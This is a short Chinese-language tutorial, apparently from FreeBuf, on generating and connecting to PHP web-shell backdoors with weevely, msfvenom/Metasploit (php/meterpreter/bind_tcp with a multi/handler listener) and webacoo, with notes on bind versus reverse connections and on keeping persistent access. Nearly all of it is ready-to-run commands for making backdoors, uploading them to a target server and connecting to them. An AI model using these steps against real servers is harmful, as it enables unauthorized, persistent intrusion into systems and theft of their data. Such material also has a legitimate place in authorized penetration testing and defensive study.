在kali linux中,我们用的比较多的就是这款php后门管理工具 weevely了。weevely支持的功能很强大,使用http头进行指令传输。唯一的缺陷就是只支持php
我们通过帮助可以看到,weevely的使用还是很简单的,首先我们在/root目录下生成一个名为weevely.php密码为123的backdoor agent
weevely generate 123 /root/weevely.php
然后我们只要上传到目标服务器之后运行
weevely <目标URL> <密码>就能成功连接上了
metasploit
metasploit框架中其实也自带了php的后门,并且配合meterpreter功能强大
在这里提一下正向连接和反向连接(bind_tcp reverse_tcp)
bind_tcp:在这里黑客主动去连接目标主机,就叫作正向连接。适用的情况是服务器在外网的情况
reverse_tcp:在这个例子中反向连接就是被入侵的主机反过来来连接黑客,就叫作反向连接,在目标服务器在内网或有防火墙的情况下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中lhost为目标服务器的地址 lport是目标服务器会开放的端口 -o后面是后门输出的路径
然后进入msfconsole
xu
选择exploit/multi/handler这个模块
然后设置payload为php/meterpreter/bind_tcp
最后设置一下目标的ip然后输入run开始监听
触发木马的方法就是访问后门的网址
然后msfconsole如果有连接信息说明已经连接成功
使用方式可以参考meterpreter
参考链接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64编码后隐藏在Cookie头中,隐蔽性较强,webacoo的缺点是不能指定密码,所以。。。不推荐作为持续性攻击的权限维持的选择
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目录下
上传成功之后用命令
webacoo -t -u 来连接
成功后会生成一个仿真终端,可以使用load命令来加载模块,之后可以进行上传下载,连接数据库等操作。只是不能设置密码是个硬伤。
参考网站:http://www.jb51.net/article/30234.htm
*本文作者:你会忘了我,转载请注明来自FreeBuf